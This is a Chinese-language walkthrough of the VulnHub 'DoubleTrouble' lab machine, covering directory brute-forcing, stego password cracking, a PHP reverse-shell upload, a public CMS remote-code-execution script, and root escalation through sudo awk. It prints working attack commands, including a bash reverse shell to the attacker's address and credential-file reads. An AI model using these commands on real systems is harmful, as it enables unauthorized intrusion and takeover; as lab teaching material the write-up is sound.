vulnhub靶场【DoubleTrouble】

admin
admin
admin
138876
文章
114
评论
2025年1月16日22:50:07评论3 views字数 1947阅读6分29秒阅读模式

前言

靶机:doubletrouble,IP地址为192.168.10.10

攻击:kali,IP地址为192.168.10.2

都采用虚拟机,网卡为桥接模式

该靶机目前只剩下一个了,之前记得是有两台构成系列的。

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者通过下方链接下载https://pan.quark.cn/s/28f410dd165f

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

vulnhub靶场【DoubleTrouble】

信息收集

使用nmap扫描端口

vulnhub靶场【DoubleTrouble】

网站信息探测

访问80端口默认界面,可以看到这是某种CMS,并且版本已经有了,查看页面源代码,发现可能是目录型网站

vulnhub靶场【DoubleTrouble】

使用gobuster、ffuf、dirsearch、dirb等工具进行爆破

vulnhub靶场【DoubleTrouble】

图片隐写内容获取

访问secret,发现一张图片,下载到kali中,查看图片,发现类似于专辑的那种封面

vulnhub靶场【DoubleTrouble】

使用exiftoolbinwalk测试并无隐藏信息

vulnhub靶场【DoubleTrouble】

在使用steghide,发现输入具有输入密码操作

vulnhub靶场【DoubleTrouble】

使用该系列工具stegseek进行破解

stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt passw.txt
vulnhub靶场【DoubleTrouble】

这时候,可以使用steghide继续,或者直接使用写入到文件中的信息,以这个登录到邮件登录系统

[email protected]otis666

漏洞利用

方式一,手动上传php脚本

然后再寻找有无利用点时,发现一个上传的,是头像上传,不过这里直接上传一个php文件进行测试。

kali自带的php反弹上传,路径在/usr/share/webshells/php/php-reverse-shell.php

vulnhub靶场【DoubleTrouble】

点击保存后,发现跳转,并出现报错

vulnhub靶场【DoubleTrouble】

在之前目录爆破时,发现uploads目录,只是当时其中并未有内容,这时候再去查看,为什么呢,因为文件名称就给人是上传文件的存放处

可以看到上传的脚本文件,这里有两个,是我在进行上传后,以为哪里有问题导致没有上传成功,所以又上传了一次

vulnhub靶场【DoubleTrouble】

kali开启监听,我在这个脚本中设置的端口是1234,监听这个端口即可

点击脚本,若是网站可解析php文件,则可以反弹成功

vulnhub靶场【DoubleTrouble】

成功获取一个shell,先获取一个交互式的界面

python3 -c 'import pty;pty.spawn("/bin/bash")'

方式二,搜索CMS版本漏洞

通过CMS的版本漏洞进行获取shell

使用searchsploit搜索版本漏洞,发现有很多,这里采用远程代码执行v2,注意,这里远程代码执行的漏洞,都需要先有邮箱及密码才行。

vulnhub靶场【DoubleTrouble】

直接把这个文件复制到当前目录,然后查看一下代码内容,代码太长,这里直接找一些用处大的截图

vulnhub靶场【DoubleTrouble】

直接执行该脚本,会提示用法的

vulnhub靶场【DoubleTrouble】

这时候,根据前面获取的邮箱和密码使用j即可

python3 50944.py  -url http://192.168.10.10/ -u [email protected] -p otis666
vulnhub靶场【DoubleTrouble】

浏览器访问,发现命令执行了

vulnhub靶场【DoubleTrouble】

这时候,就可以通过传参,构造反弹shell的命令,如bashncpython

/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.2/9999 0>&1'

#经过url编码处理后使用
%2fbin%2fbash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.10.2%2f9999+0%3e%261%27
vulnhub靶场【DoubleTrouble】

靶机内信息收集

收集靶机内用户

ls -al /home
cat /etc/passwd | grep /bin/bash
vulnhub靶场【DoubleTrouble】

查看操作系统信息,以及内核版本

vulnhub靶场【DoubleTrouble】

网络状态信息

vulnhub靶场【DoubleTrouble】

查看进程信息、定时任务等

ps -aux
top
cat /etc/crontab

寻找具有SUID权限的文件

find / -perm -4000 -print 2>/dev/null
vulnhub靶场【DoubleTrouble】

发现sudo,因为并没有发现其他用户,猜测可能不需要水平提权,直接提取至root即可

提权

尝试sudo对于当前用户是否可用,发现无需密码,并且awk可进行sudo

vulnhub靶场【DoubleTrouble】

若不知道或忘记awksudo提取,可以借助网站gtfobins.github.io获取

vulnhub靶场【DoubleTrouble】
sudo /usr/bin/awk 'BEGIN {system("/bin/bash")}'
vulnhub靶场【DoubleTrouble】

不过没有flag,可能到这里就可以了

总结

该靶机考察以下几点:

  1. 网站目录爆破
  2. 图片隐写内容及其密码的暴力破解
  3. 通过上传头像处的文件上传漏洞,促使反弹shell
  4. searchsploit的使用,以及发现CMS版本漏洞,会利用
  5. 对于sudo各种命令的提权

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场【DoubleTrouble】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月16日22:50:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场【DoubleTrouble】https://cn-sec.com/archives/3635825.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息